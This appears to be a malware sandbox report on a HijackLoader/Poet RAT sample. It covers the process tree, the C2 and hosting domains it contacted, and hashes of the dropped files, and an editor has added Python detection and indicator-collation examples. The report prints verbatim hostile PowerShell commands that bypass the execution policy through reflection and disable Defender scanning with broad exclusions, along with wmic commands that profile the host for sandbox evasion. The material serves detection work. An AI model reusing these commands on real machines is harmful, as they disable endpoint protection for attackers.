Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4304 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3660 wrote to memory of 4044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3660 wrote to memory of 4044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3660 wrote to memory of 4044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3660 wrote to memory of 4044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4044 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4044 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4044 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2532 wrote to memory of 3976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2532 wrote to memory of 3976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2532 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\naver\naver.exe
PID 2532 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\naver\naver.exe
PID 2192 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\system32\wbem\wmic.exe
PID 2192 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\system32\wbem\wmic.exe
PID 2192 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\system32\wbem\wmic.exe
PID 2192 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\system32\wbem\wmic.exe
PID 2192 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3836,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"

C:\Users\Admin\AppData\Local\naver\naver.exe

C:\Users\Admin\AppData\Local\naver\naver.exe -install

C:\Users\Admin\AppData\Local\naver\naver.exe

"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -noprofile -nologo -command -
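The command lines above carry the behaviour a detection engineer should key on: the first PowerShell instance replaces the session's AuthorizationManager through reflection (so the execution policy is never consulted), then turns off Defender IOAV and script scanning and excludes `C:\*` and `.exe`; two further instances are started with a bare `-` (or `-command -`), which makes PowerShell read the script from stdin so command-line logging never sees the payload; wmic is used to profile chassis type, PC system type and OS language (values commonly used to spot virtual machines and to gate on locale); and the dropped `naver.exe` is installed as a MeshAgent service under a custom name. The following is an added example written by the editor, not the sandbox's signature engine: the events are constructed from this report's Processes and WriteProcessMemory sections (paths abbreviated, repeated wmic runs dropped, the parent of the service instance of `naver.exe` set to 0 because the report does not record it), and the ATT&CK ids are the editor's mapping.

```python
"""Rule-based triage of a sandbox process tree (editor's example, not the
sandbox's own code). Events are constructed from the report's process list."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int      # 0 when the report does not record a parent
    image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    rule: str
    technique: Optional[str]   # ATT&CK id (editor's mapping), None for tree-shape rules
    detail: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NAVER = r"C:\Users\Admin\AppData\Local\naver\naver.exe"
WMIC = r"C:\Windows\System32\wbem\wmic.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# The Defender-tampering command line from the report, verbatim apart from the image path.
PS_TAMPER = (
    PS + ' -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = '
    '$executionContext.GetType().GetField(\\"_context\\",\\"NonPublic,Instance\\")'
    '.GetValue($executionContext)).GetType().GetField(\\"_authorizationManager\\",'
    '\\"NonPublic,Instance\\").SetValue($ctx, (New-Object System.Management.Automation'
    '.AuthorizationManager \\"Microsoft.PowerShell\\"))} Disable-ExecutionPolicy ; '
    "Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; "
    "Add-MpPreference -ExclusionPath 'C:\\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; \""
)

# Constructed from the report (sample.exe stands in for the long sample file name).
SAMPLE_EVENTS = [
    ProcEvent(4304, 0, r"C:\Users\Admin\AppData\Local\Temp\sample.exe", r'"C:\Users\Admin\AppData\Local\Temp\sample.exe"'),
    ProcEvent(3660, 4304, PS, PS_TAMPER),
    ProcEvent(2064, 4304, PS, "powershell -"),
    ProcEvent(4044, 3660, EDGE, f'"{EDGE}"'),
    ProcEvent(2532, 4044, CHROME, f'"{CHROME}"'),
    ProcEvent(3976, 2532, PS, "powershell \"Add-MpPreference -ExclusionExtension '.exe' -Force\""),
    ProcEvent(5036, 2532, NAVER, f"{NAVER} -install"),
    ProcEvent(2192, 0, NAVER, f'"{NAVER}" --meshServiceName="naver Service"'),
    ProcEvent(692, 2192, WMIC, "wmic SystemEnclosure get ChassisTypes"),
    ProcEvent(516, 2192, WMIC, "wmic os get oslanguage /FORMAT:LIST"),
    ProcEvent(2216, 2192, WMIC, r'wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"'),
    ProcEvent(2868, 2192, PS, "powershell -noprofile -nologo -command -"),
]

CMDLINE_RULES = [
    # (rule name, ATT&CK id, pattern searched in the command line)
    ("defender_tamper", "T1562.001",
     re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion(?:Path|Extension)", re.I)),
    ("execpolicy_reflection_bypass", "T1562.001",
     re.compile(r"_authorizationManager|Automation\.AuthorizationManager", re.I)),
    # A trailing lone "-" makes powershell read the script from stdin: nothing of the
    # payload reaches process-creation logs, so the shape itself is the indicator.
    ("powershell_script_from_stdin", "T1059.001",
     re.compile(r"powershell(?:\.exe)?\s+(?:-\w+\s+)*-\s*$", re.I)),
    ("wmic_host_profiling", "T1082",
     re.compile(r"wmic\s+(?:SystemEnclosure\s+get\s+ChassisTypes|ComputerSystem\s+get\s+PCSystemType|os\s+get\s+oslanguage)", re.I)),
    ("meshagent_install", "T1219",
     re.compile(r"--meshServiceName=|(?:^|\s)-(?:full)?install\b", re.I)),
]
BROWSERS = {"msedge.exe", "chrome.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Apply command-line rules to every event, plus one parent/child rule:
    a browser spawning a script interpreter or an executable from %LOCALAPPDATA%."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        for name, tid, pat in CMDLINE_RULES:
            m = pat.search(e.cmdline)
            if m:
                findings.append(Finding(e.pid, name, tid, m.group(0)))
        parent = by_pid.get(e.ppid)
        if parent and basename(parent.image) in BROWSERS:
            child = basename(e.image)
            if child in INTERPRETERS or "\\appdata\\local\\" in e.image.lower():
                findings.append(Finding(e.pid, "browser_spawned_child", None,
                                        f"{basename(parent.image)} -> {child}"))
    return findings


def rules_for(findings, pid):
    return {f.rule for f in findings if f.pid == pid}


def techniques(findings):
    """Map ATT&CK id -> set of PIDs that triggered a rule carrying that id."""
    out = defaultdict(set)
    for f in findings:
        if f.technique:
            out[f.technique].add(f.pid)
    return dict(out)


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.pid:>5} {f.rule:<30} {f.technique or '-':<10} {f.detail[:60]}")
```

Run against the constructed events, the rules flag PID 3660 for both the Defender tampering and the AuthorizationManager swap, PIDs 2064 and 2868 for stdin-fed scripts, the three wmic children for host profiling, and PIDs 5036 and 2192 for the MeshAgent install; PIDs 3976 and 5036 are additionally flagged because their parent is chrome.exe. The regexes are deliberately narrow to the strings seen here; in production they would be widened (encoded commands, `Set-MpPreference` via aliases or splatting) and paired with Defender's own event log entries for the preference changes.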

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.logflare.app udp
US 172.67.144.216:443 api.logflare.app tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 216.144.67.172.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ubiquitous-cucurucho-343e97.netlify.app udp
DE 3.72.140.173:443 ubiquitous-cucurucho-343e97.netlify.app tcp
US 8.8.8.8:53 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev udp
US 172.67.144.216:443 api.logflare.app tcp
US 172.66.0.235:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 8.8.8.8:53 173.140.72.3.in-addr.arpa udp
US 8.8.8.8:53 te.legra.ph udp
NL 149.154.164.13:443 te.legra.ph tcp
US 8.8.8.8:53 235.0.66.172.in-addr.arpa udp
US 8.8.8.8:53 13.164.154.149.in-addr.arpa udp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 172.67.144.216:443 api.logflare.app tcp
US 172.67.144.216:443 api.logflare.app tcp
US 172.67.144.216:443 api.logflare.app tcp
US 172.66.0.235:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 172.66.0.235:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 151.101.193.229:443 cdn.jsdelivr.net tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 229.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 sktelecom.netlify.app udp
US 172.67.144.216:443 api.logflare.app tcp
US 172.67.144.216:443 api.logflare.app tcp
US 172.67.144.216:443 api.logflare.app tcp
DE 52.58.254.253:443 sktelecom.netlify.app tcp
US 8.8.8.8:53 api.skt.cam udp
US 172.67.147.63:443 api.skt.cam tcp
US 8.8.8.8:53 253.254.58.52.in-addr.arpa udp
US 8.8.8.8:53 microsoft.devq.workers.dev udp
US 104.21.61.174:443 microsoft.devq.workers.dev tcp
US 8.8.8.8:53 63.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 174.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 sktelecom.duckdns.org udp
KR 203.234.238.140:443 sktelecom.duckdns.org tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 140.238.234.203.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
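Most rows in the table above are DNS traffic to 8.8.8.8, and many of those are `in-addr.arpa` PTR queries that simply reverse the addresses the sample had just connected to; the blockable indicators are the names that were actually contacted over TCP 443. The following is an added example by the editor, not sandbox tooling: it parses an excerpt of the table (a constructed subset of the rows above, same column layout), links each PTR query back to the forward IP, and collates the real contacts into an IOC list. The suffix list used to flag free-tier or dynamic-DNS hosting is the editor's own and is a triage hint, not a verdict on the providers.

```python
"""Collate a sandbox Network table into contacted-host IOCs (editor's example)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed excerpt of the report's Network table (same columns, subset of rows).
REPORT_NETWORK = """\
Country Destination Domain Proto
US 8.8.8.8:53 api.logflare.app udp
US 172.67.144.216:443 api.logflare.app tcp
US 8.8.8.8:53 216.144.67.172.in-addr.arpa udp
US 8.8.8.8:53 ubiquitous-cucurucho-343e97.netlify.app udp
DE 3.72.140.173:443 ubiquitous-cucurucho-343e97.netlify.app tcp
US 8.8.8.8:53 te.legra.ph udp
NL 149.154.164.13:443 te.legra.ph tcp
US 8.8.8.8:53 sktelecom.duckdns.org udp
KR 203.234.238.140:443 sktelecom.duckdns.org tcp
US 8.8.8.8:53 140.238.234.203.in-addr.arpa udp
US 104.21.61.174:443 microsoft.devq.workers.dev tcp
"""


@dataclass
class Conn:
    country: str
    ip: str
    port: int
    domain: str
    proto: str


@dataclass
class Contact:
    ips: set = field(default_factory=set)
    ports: set = field(default_factory=set)
    countries: set = field(default_factory=set)
    resolved: bool = False   # a forward DNS query for this name was observed


PTR_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa$")
# Editor's list of hosting that is trivial to register anonymously; a hint, not a verdict.
THROWAWAY_SUFFIXES = (".duckdns.org", ".netlify.app", ".workers.dev", ".r2.dev")


def parse_network(text):
    """Parse 'Country Destination Domain Proto' rows; the first line is the header."""
    conns = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        conns.append(Conn(country, ip, int(port), domain, proto))
    return conns


def reverse_ptr(name):
    """'216.144.67.172.in-addr.arpa' -> '172.67.144.216', or None for non-PTR names."""
    m = PTR_RE.match(name)
    return ".".join(reversed(m.groups())) if m else None


def collate(conns):
    """Split rows into real contacts (domain -> Contact) and the set of IPs that
    were looked up in reverse; plain forward DNS queries only set `resolved`."""
    contacts = defaultdict(Contact)
    ptr_targets = set()
    for c in conns:
        ip = reverse_ptr(c.domain)
        if ip:
            ptr_targets.add(ip)
            continue
        if c.proto == "udp" and c.port == 53:
            contacts[c.domain].resolved = True
            continue
        ct = contacts[c.domain]
        ct.ips.add(c.ip)
        ct.ports.add(c.port)
        ct.countries.add(c.country)
    return dict(contacts), ptr_targets


def ioc_rows(contacts):
    """(domain, ips, ports, hosting_flag) for every name that was actually connected to."""
    rows = []
    for domain, ct in sorted(contacts.items()):
        if not ct.ips:
            continue   # resolved but never connected: keep out of the block list
        flag = next((s for s in THROWAWAY_SUFFIXES if domain.endswith(s)), "")
        rows.append((domain, sorted(ct.ips), sorted(ct.ports), flag))
    return rows


if __name__ == "__main__":
    contacts, ptrs = collate(parse_network(REPORT_NETWORK))
    for domain, ips, ports, flag in ioc_rows(contacts):
        print(f"{domain:<45} {','.join(ips):<18} {ports} {flag}")
    print("reverse-looked-up IPs:", sorted(ptrs))
```

On the excerpt, every reverse-looked-up address is one the sample connected to over 443, which is why PTR rows are dropped from the IOC list rather than treated as extra infrastructure; the three names on throwaway hosting (`duckdns.org`, `netlify.app`, `workers.dev`) are the ones worth the first look when hunting, while `api.logflare.app` and `cdn.jsdelivr.net`-style CDNs need corroboration before blocking.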

Files

memory/3660-1-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21kxgm1v.tpz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3660-7-0x000001DAD2350000-0x000001DAD2372000-memory.dmp

memory/3660-12-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-13-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-14-0x000001DAD2BC0000-0x000001DAD2C04000-memory.dmp

memory/2064-15-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/2064-16-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/2064-17-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-27-0x000001DAD2C90000-0x000001DAD2D06000-memory.dmp

memory/2064-30-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-31-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp

memory/3660-32-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-33-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e89c193840c8fb53fc3de104b1c4b092
SHA1 8b41b6a392780e48cc33e673cf4412080c42981e
SHA256 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
SHA512 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/3660-52-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

C:\Users\Admin\AppData\Local\naver\naver.exe

MD5 c41e8324cb68c07c2bbff56d645cae53
SHA1 13518a95a782ea595aff1e7f15397d2968738718
SHA256 4f9f9cc3996b3f8ee33b46263ad726085ee4f06520012bcfb6a2df77ecdb7917
SHA512 7b2271be16d9729c32398b62299c5526dc6c9d98ef3213513554eb46f21917f50ab4b82b5e83ca83582c3b570e8a79713d2bf0779162d687aebbd3b47dd0900b

C:\Users\Admin\AppData\Local\naver\naver.msh

MD5 2dd515ea546a81398d94dd15e3b4d55c
SHA1 eb0b0fca721a296906166b7e972559b87353b726
SHA256 becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
SHA512 439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb